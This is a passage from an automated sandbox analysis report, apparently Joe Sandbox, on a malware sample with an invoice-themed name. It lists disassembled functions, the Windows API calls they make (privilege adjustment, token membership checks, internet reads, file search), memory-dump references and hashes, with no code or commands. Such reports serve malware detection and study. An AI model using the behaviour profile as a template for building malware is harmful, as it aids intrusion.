                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Internet$AvailableDataFileQueryRead
                                                                            • String ID:
                                                                            • API String ID: 599397726-0
                                                                            • Opcode ID: e29fa93d7f5943a36cc671546d33b0c074c8eb341e378f2386edd7065acda07a
                                                                            • Instruction ID: 6966324227132ccef0e1ba28e52f7ceeb39c0a9988b64c77fff3d91e3b029122
                                                                            • Opcode Fuzzy Hash: e29fa93d7f5943a36cc671546d33b0c074c8eb341e378f2386edd7065acda07a
                                                                            • Instruction Fuzzy Hash: 4E41F372904209BFEB50DE95DC81FBBBBBCEB40324F50407AFE45A6152EA749E41B660
                                                                            Function 00F3B3FB Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 00F3B40B
                                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00F3B465
                                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00F3B4B2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$DiskFreeSpace
                                                                            • String ID:
                                                                            • API String ID: 1682464887-0
                                                                            • Opcode ID: f1d0a270afd974743f940b3cd3777965e0c75474d8f41e7560a4699b94a70418
                                                                            • Instruction ID: 4310f7dd76113acce9c2c9944fd39023296a82db641397f3a6f9e35d17ca4bf1
                                                                            • Opcode Fuzzy Hash: f1d0a270afd974743f940b3cd3777965e0c75474d8f41e7560a4699b94a70418
                                                                            • Instruction Fuzzy Hash: 87215135A00608DFCB00EFA5DC80AEDBBB8FF49314F1480AAE905EB352CB319915DB50
                                                                            Function 00F287E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00EF0DB6: std::exception::exception.LIBCMT ref: 00EF0DEC
                                                                              • Part of subcall function 00EF0DB6: __CxxThrowException@8.LIBCMT ref: 00EF0E01
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F2882B
                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F28858
                                                                            • GetLastError.KERNEL32 ref: 00F28865
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                            • String ID:
                                                                            • API String ID: 1922334811-0
                                                                            • Opcode ID: 5c4fcf4ae3368387a608185d5424bacd81d33272a9f5e47338be13c4233dfadb
                                                                            • Instruction ID: 0734dc62a12eb113429989905775b795cfa7cd27075f1f19f813200ca2739af2
                                                                            • Opcode Fuzzy Hash: 5c4fcf4ae3368387a608185d5424bacd81d33272a9f5e47338be13c4233dfadb
                                                                            • Instruction Fuzzy Hash: FB11BFB2804308AFE718DFA4EC85D6BB7F8EB04311B24856EF55593241EB30BC018B60
                                                                            Function 00F2874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00F28774
                                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00F2878B
                                                                            • FreeSid.ADVAPI32(?), ref: 00F2879B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                            • String ID:
                                                                            • API String ID: 3429775523-0
                                                                            • Opcode ID: 8735c310e99ceedc6ef6185c38dc5143e7eac9892e7dce3381ffcd0ef4548cb2
                                                                            • Instruction ID: 1919a47b44f1e4bde25cd780212901492c5951e9f3bdeaefd6132ad6d6ba08ea
                                                                            • Opcode Fuzzy Hash: 8735c310e99ceedc6ef6185c38dc5143e7eac9892e7dce3381ffcd0ef4548cb2
                                                                            • Instruction Fuzzy Hash: D4F04F7591130CBFDF00DFF4DC89AAEB7BCEF08311F1044A9AA01E2181D6715A089B50
                                                                            Function 00F34C7F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00F34CB3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: mouse_event
                                                                            • String ID: DOWN
                                                                            • API String ID: 2434400541-711622031
                                                                            • Opcode ID: 6a91134b6e1fdbc42196577956edeb6ab81679feaa31584e4dd8ec01605ffb75
                                                                            • Instruction ID: 6561690969e792872deee8efec52d62175a755ee4894568487c4dede240b39ac
                                                                            • Opcode Fuzzy Hash: 6a91134b6e1fdbc42196577956edeb6ab81679feaa31584e4dd8ec01605ffb75
                                                                            • Instruction Fuzzy Hash: 88E046221AD72238A9042958BC03EF7128C8B12371B20224AFA10E54C1EE807C8275B9
                                                                            Function 00ED16DE Relevance: 3.1, APIs: 2, Instructions: 83nativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00ED2612: GetWindowLongW.USER32(?,000000EB), ref: 00ED2623
                                                                              • Part of subcall function 00ED25DB: GetWindowLongW.USER32(?,000000EB), ref: 00ED25EC
                                                                            • GetParent.USER32(?), ref: 00F0B7BA
                                                                            • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,00ED19B3,?,?,?,00000006,?), ref: 00F0B834
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: LongWindow$DialogNtdllParentProc_
                                                                            • String ID:
                                                                            • API String ID: 314495775-0
                                                                            • Opcode ID: cadd727571a3c356f562325ba865d87ffb4730cddbf13772622df7342253b34c
                                                                            • Instruction ID: bd7185a792cd04eec6de848c1deae178b820d4f6eb35f482e327f157c0f42cac
                                                                            • Opcode Fuzzy Hash: cadd727571a3c356f562325ba865d87ffb4730cddbf13772622df7342253b34c
                                                                            • Instruction Fuzzy Hash: 7E219334601108BFDB118F28C884EA93BD6EB4A324F585296F6256B3F2C7319D12FB51
                                                                            Function 00F3C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00F3C6FB
                                                                            • FindClose.KERNEL32(00000000), ref: 00F3C72B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Find$CloseFileFirst
                                                                            • String ID:
                                                                            • API String ID: 2295610775-0
                                                                            • Opcode ID: fa4d2db3ddc26859d41a59f17bb653f1619b91c74e50bded628bf58e9658d276
                                                                            • Instruction ID: 66daca8049b54c1f6f1e31df180aa21198e0665b0f604361518e9df0feec1e0c
                                                                            • Opcode Fuzzy Hash: fa4d2db3ddc26859d41a59f17bb653f1619b91c74e50bded628bf58e9658d276
                                                                            • Instruction Fuzzy Hash: 48118E766002049FDB10EF29DC45A2AF7E8EF85325F00851EF9A9D73A1DB30A805DB81
                                                                            Function 00F5C57D Relevance: 3.0, APIs: 2, Instructions: 46nativewindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00ED2612: GetWindowLongW.USER32(?,000000EB), ref: 00ED2623
                                                                            • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,00F0B93A,?,?,?), ref: 00F5C5F1
                                                                              • Part of subcall function 00ED25DB: GetWindowLongW.USER32(?,000000EB), ref: 00ED25EC
                                                                            • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00F5C5D7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: LongWindow$DialogMessageNtdllProc_Send
                                                                            • String ID:
                                                                            • API String ID: 1273190321-0
                                                                            • Opcode ID: 9bda79f0cddb2aaeac5d13cd646241290e7e423ca07e0c4544c273e310bf79d5
                                                                            • Instruction ID: a3f5ff2aba4709f4637453c577662ef8cb18f63593d63c2d91701c63204cdbfb
                                                                            • Opcode Fuzzy Hash: 9bda79f0cddb2aaeac5d13cd646241290e7e423ca07e0c4544c273e310bf79d5
                                                                            • Instruction Fuzzy Hash: 7A019231200308AFCB225F54DC44E6A3BA6FB85761F180169FB521B2E1DB31A916FB91
                                                                            Function 00F5C93E Relevance: 3.0, APIs: 2, Instructions: 33nativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ClientToScreen.USER32(?,?), ref: 00F5C961
                                                                            • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,00F0BA16,?,?,?,?,?), ref: 00F5C98A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ClientDialogNtdllProc_Screen
                                                                            • String ID:
                                                                            • API String ID: 3420055661-0
                                                                            • Opcode ID: d736318feb860541d9888c4f54b708401b261ff9e1eb3bd667971373ef9220b2
                                                                            • Instruction ID: 435ed8c3c5abc0345c819f06d9b3670abc074db51b0d8b758b7928d83e1b7c16
                                                                            • Opcode Fuzzy Hash: d736318feb860541d9888c4f54b708401b261ff9e1eb3bd667971373ef9220b2
                                                                            • Instruction Fuzzy Hash: 45F0307241021CFFDF058F45DC099BE7FB9FB44312F14415AFA4152161D3716A54EBA4
                                                                            Function 00F3A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00F49468,?,00F5FB84,?), ref: 00F3A097
                                                                            • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00F49468,?,00F5FB84,?), ref: 00F3A0A9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFormatLastMessage
                                                                            • String ID:
                                                                            • API String ID: 3479602957-0
                                                                            • Opcode ID: 07a5a95624c145b021e4538ef70e91a35145b9f321b6760260a6bff5d7cda734
                                                                            • Instruction ID: 9fb5b6da2e06bc5f3974788c4f6ae21fdb1184c92fd6f3634b2f550a7f8a91f7
                                                                            • Opcode Fuzzy Hash: 07a5a95624c145b021e4538ef70e91a35145b9f321b6760260a6bff5d7cda734
                                                                            • Instruction Fuzzy Hash: 5CF0E23610432DABDB20AFA4CC48FEA736CFF08361F0041A6F948D3180D6309904DBA1
                                                                            Function 00F5CA7C Relevance: 3.0, APIs: 2, Instructions: 23nativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 00F5CA84
                                                                            • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,00F0B995,?,?,?,?), ref: 00F5CAB2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: DialogLongNtdllProc_Window
                                                                            • String ID:
                                                                            • API String ID: 2065330234-0
                                                                            • Opcode ID: 6438c823d86199316c4e0ebc2cbafec85caea7307e5ae0abe460a59fa01362d4
                                                                            • Instruction ID: e7fb10ad9e83606a1127df7a2d0ae2e920668175b14035ef641c15e7df13b7ca
                                                                            • Opcode Fuzzy Hash: 6438c823d86199316c4e0ebc2cbafec85caea7307e5ae0abe460a59fa01362d4
                                                                            • Instruction Fuzzy Hash: 3EE04F70100318BFEB159F19DC1AFBA3B54EB04752F508115FA56D91E1C6749854A7A0
                                                                            Function 00F281CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F28309), ref: 00F281E0
                                                                            • CloseHandle.KERNEL32(?,?,00F28309), ref: 00F281F2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                                            • String ID:
                                                                            • API String ID: 81990902-0
                                                                            • Opcode ID: 98b5a972f9c193a9629ba5fdc96ab3ea03db0df0d17efb355873070dba2b94e4
                                                                            • Instruction ID: 70b363aab868733c7f963803a82a6d1cecad1131fa1cd08075e33dfcb70666ab
                                                                            • Opcode Fuzzy Hash: 98b5a972f9c193a9629ba5fdc96ab3ea03db0df0d17efb355873070dba2b94e4
                                                                            • Instruction Fuzzy Hash: 68E08631001610AFEB212B20FC04D7377E9EF00311714886DF55580471CB215C91EB10
                                                                            Function 00EFA155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,00F64178,00EF8D57,t of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.,?,?,00000001), ref: 00EFA15A
                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00EFA163
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled
                                                                            • String ID:
                                                                            • API String ID: 3192549508-0
                                                                            • Opcode ID: 57a7fca5790c5fc255ee38962d903c779b39291ad0c992a999068a9a14712872
                                                                            • Instruction ID: 773c7e12cdaa0b973ac8cb3be7ec47e3d8291cafbdc3c1e0424e9d5612caf2d8
                                                                            • Opcode Fuzzy Hash: 57a7fca5790c5fc255ee38962d903c779b39291ad0c992a999068a9a14712872
                                                                            • Instruction Fuzzy Hash: 9FB0923105430CABEA002F91ED09B893F68EB46AA3F4040A0F70D84070CB625454AA91
                                                                            Function 00EDE6A0 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • Variable must be of type 'Object'., xrefs: 00F13E62
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Variable must be of type 'Object'.
                                                                            • API String ID: 0-109567571
                                                                            • Opcode ID: 3ae0901643491a8e9ae3ef23bb82fc6f979ca0aafdc90be60baa190f7b0932b3
                                                                            • Instruction ID: 2bfa8256ebb9ebd3e7cc46a97f1d4afbc01aec6af3bf731577d378f9503c035e
                                                                            • Opcode Fuzzy Hash: 3ae0901643491a8e9ae3ef23bb82fc6f979ca0aafdc90be60baa190f7b0932b3
                                                                            • Instruction Fuzzy Hash: F0A28D75A00209CFCB24DF58C884AAEB7B2FF59314F24905AE816AF351D775ED82DB90
                                                                            Function 00EFF1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 973b818caf853693d0abb8b596f240d48de94d18c6ac64689341cded386dfcc0
                                                                            • Instruction ID: 86ef890d6e9fc176fb77bff4d2e6e00188c0198ae5b43abdcd3b958aa2355bd6
